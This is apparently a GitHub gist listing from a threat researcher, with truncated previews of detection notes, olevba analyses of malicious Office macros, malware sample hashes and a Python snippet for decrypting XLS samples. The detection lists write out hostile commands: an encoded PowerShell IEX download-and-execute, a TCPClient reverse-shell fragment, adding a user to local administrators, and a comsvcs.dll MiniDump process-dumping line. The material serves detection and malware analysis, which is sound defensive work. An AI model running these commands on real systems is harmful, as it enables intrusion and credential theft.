John Lambert JohnLaTwC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // suspicious PowerShell commands contacting URLs, adding admins, receiving commands | |
| powershell -w 1 -exec bypass -e aQBlAH… --> "iex ((" | |
| powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "... | |
| powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('. | |
| powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")" | |
| powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID | |
| powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber | |
| powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber | |
| C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| By @JohnLaTwC | |
| References: | |
| https://risksense.com/blog/hidden-gems-in-windows-the-hunt-is-on/ by Jenna Magius and Nate Caroe (@RiskSense) | |
| https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ | |
| https://twitter.com/SBousseaden/status/1407742041170268166 - Calling MiniDump export by ordinal examples: (comsvcs,#24) | |
| Detection Examples: | |
| "C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump <PID> \Windows\Temp\<filename>.dmp full |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:64 | |
| > reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /reg:32 | |
| > reg query "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Dim isR As Boolean |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://www.virustotal.com/gui/search/gen_excel_xor_obfuscation_velvetsweatshop/comments | |
| XOR encrypted .XLS | |
| 0d01bf2ba4985397910a7924c02036b71132febe46f5f9b79a1bd3de440dc53d | |
| 0e334135f0bc0e6832c50ec2fe3681816fd63a1843214a433cc92f59e77a4247 | |
| 1bcf2d09a64a536efa4831600d00c6daad6b1751fa6d2ae111a7abb7ff0b61bb | |
| 307ea21a8cba83a8d7e58ebbd131a63cb8ae3d2281bd7a93004d8be78b70107e | |
| 386f8f8b2a9d16767e1b17b714e87cd4f0b234bfded0ed2752b9a2568edeb15f | |
| 640508607e89322f8a4cb844f33fad2ef51fc22afdbec3224ec8f9ef8a345edc | |
| 92859da9f5ec97c9c7646122138e996bb57021bb9fdee295f5ddb960390682e4 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filename = r"419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e" | |
| password = "VelvetSweatshop" | |
| encryption_removed_filename = filename + '.saved.xls' | |
| from xlrd import * | |
| import win32com.client | |
| xlApp = win32com.client.Dispatch("Excel.Application") | |
| xlwb = xlApp.Workbooks.Open(filename, Password=password) | |
| xlwb.SaveAs(encryption_removed_filename) | |
| xlApp.Application.quit() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 419301a8b6bb734a27fe3682eb6231113c36ce525c4b0dec220cb9b9b7f9ca0e | |
| b6d8909eef7b6a573ed668c4f31e8da8dc80f80c2a45074c81a157aebafb1ed7 | |
| df08a59ec2e0cbb8a061d56fa66bcb9e0ab8bfe5201f84ae07b7ac1832c13301 | |
| 748d566d867a4667be25bdcba01e114bb3e8fa09d4a1d007f36ec9b093023dc5 | |
| f4256d69b126ae9f3ae76caa6a24fade4a2cd1f036abf1e3177124c7086725dd | |
| 1eef14ff38cdfe55bb255de4d5f8c383198987f113898a8e3866a0752c4d337b | |
| 8257663d61277d20aa2fecf3e54a6a04a135919b14c97590a3cd1022c0e4590c | |
| d4aec8c01b61e2fc6eb9a3ad715a367f8ccb38df4dcf77aaae405611b4edb9b9 | |
| ca7ef70f3dc9a6e3bac27062d139e3588c13c2601ae71b1fe9ed1ca864281cb5 | |
| c31a630707b3f2f378915107920eb4bfcb806c0b77be6037e2e8a63596cd797a |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Raccine | |
| // A Simple Ransomware Vaccine | |
| // https://github.com/Neo23x0/Raccine | |
| // | |
| // Florian Roth, Ollie Whitehouse | |
| #include <WCHAR.h> | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #include <stdio.h> |
JohnLaTwC
/ 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2
Created
October 2, 2020 16:23
Recon maldoc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisWorkbook.cls | |
| in file: 547e34240e1fed85db1fb3a7e2a528290eb7ec5c64257b10fe6e2fc0654e3bc2 - OLE stream: '_VBA_PROJECT_CUR/VBA/ThisWorkbook' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Public RUNNING As Boolean |
JohnLaTwC
/ gist:c8414282ce49acc88c1ac39f5fab8e78
Created
October 1, 2020 02:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: a16ac529b34aab3eb7e262b830d73aa78aa967ad4a8810349040cdbbe2e885b5 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| #If Mac Then | |
| Private Sub Document_Open() |
NewerOlder